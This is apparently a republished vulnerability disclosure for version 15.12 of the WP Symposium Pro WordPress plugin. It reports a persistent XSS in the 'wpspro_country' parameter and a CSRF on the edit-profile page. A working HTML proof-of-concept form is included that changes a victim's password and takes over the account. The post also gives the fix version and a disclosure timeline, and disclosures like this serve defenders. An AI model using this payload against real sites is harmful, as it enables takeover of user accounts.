扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 |
#Product: WP Symposium Pro Social Network plugin #Exploit Author: Rahul Pratap Singh #Home page Link: https://wordpress.org/plugins/wp-symposium-pro #Version: 15.12 #Website : 0x62626262.wordpress.com #Twitter : @0x62626262 #Linkedin : https://in.linkedin.com/in/rahulpratapsingh94 #Date: 8/Jan/2016 1) XSS Vulnerability: Vulnerable Code: file: wps_usermeta_shortcodes.php "wpspro_country" parameter is not sanitized, that leads to persistent xss. Video Demonstration: https://www.youtube.com/watch?v=Xglc3rNZPXs 2) CSRF Vulnerability: Description: Edit profile page is vulnerable to CSRF, that allows to change password which in turn leads to full account takeover. Exploit: <html> <body> <form action="http://localhost/wp422/wordpress/index.php/edit-profile/" method="POST" enctype="multipart/form-data"> <input type="hidden" name="wps_usermeta_change_update" value="yes" /> <input type="hidden" name="wpspro_display_name" value="rahul" /> <input type="hidden" name="wpspro_firstname" value="hello1" /> <input type="hidden" name="wpspro_lastname" value="hello2" /> <input type="hidden" name="wpspro_email" value=" " /> <input type="hidden" name="wpsro_home" value="hello4" /> <input type="hidden" name="wpspro_country" value="hello5" /> <input type="hidden" name="wpspro_password" value="asdf" /> <input type="hidden" name="wpspro_password2" value="asdf" /> <input type="submit" value="Submit request" /> </form> </body> </html> Video Demonstration: https://www.youtube.com/watch?v=sN65HlCRe9c Fix: Update to version 16.1 Disclosure Timeline: reported to vendor: 6/1/2016 vendor response : 6/1/2016 vendor acknowledged : 6/1/2016 vendor scheduled a patch: 7/1/2016 CVE Number : Not assigned yet |
体验盒子
